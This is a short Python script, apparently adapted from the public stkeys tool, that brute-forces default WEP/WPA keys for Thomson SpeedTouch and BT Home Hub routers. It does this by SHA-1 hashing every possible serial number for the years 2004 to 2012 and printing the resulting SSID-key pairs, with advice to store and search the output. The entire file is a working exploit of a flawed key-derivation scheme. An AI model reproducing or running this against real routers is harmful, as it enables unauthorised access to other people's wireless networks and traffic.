ssid2key_printall.py

#!/usr/bin/python
#
# Slightly modified version of the script by Kevin Devine (see below).
# This version computes SSID-key pairs and prints them to stdout.
# You can save the results to a text file and search it for faster
# lookup. It's faster than generating them every time, especially since
# the year list has been expanded to 2012, but of course it takes up
# space.
#
# I suggest you save the output to a text file, zip it and use zgrep to
# search when needed.
#
# ====== Original description follows ==========
#
# Python version of stkeys.c by Kevin Devine (see http://weiss.u40.hosting.digiweb.ie/stech/)
# Requires Python 2.5 for hashlib
#
# This script will generate possible WEP/WPA keys for Thomson SpeedTouch / BT Home Hub routers,
# given the last 4 or 6 characters of the default SSID. E.g. For SSID 'SpeedTouchF8A3D0' run:
#
# ./ssid2key.py f8a3d0
#
# By Hubert Seiwert, hubert.seiwert@nccgroup.com 2008-04-17
#
# By default, keys for router serial numbers matching years 2005 to 2007 will be generated.
# If you wish to change this, edit year_list below.

import sys
import hashlib

offset = 34     # SSID fixed length 6. Could be wrong.
charset = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
year_list = [2004,2005,2006,2007,2008,2009,2010,2011,2012]

def ascii2hex(char):
        return hex(ord(char))[2:]

for year in [y-2000 for y in year_list]:
        for week in range(1,53): #1..52
                #print 'Trying year 200%d week %d' % (year,week)
                for char1 in charset:
                        for char2 in charset:
                                for char3 in charset:
                                        sn = 'CP%02d%02d%s%s%s' % (year,week,ascii2hex(char1),ascii2hex(char2),ascii2hex(char3))
                                        hash = hashlib.sha1(sn.upper()).hexdigest()
                                        print "SSID: %s  | Key: %s  | Year-Week: %s-%s" % (hash[offset:], hash[0:10].upper(), year+2000, week)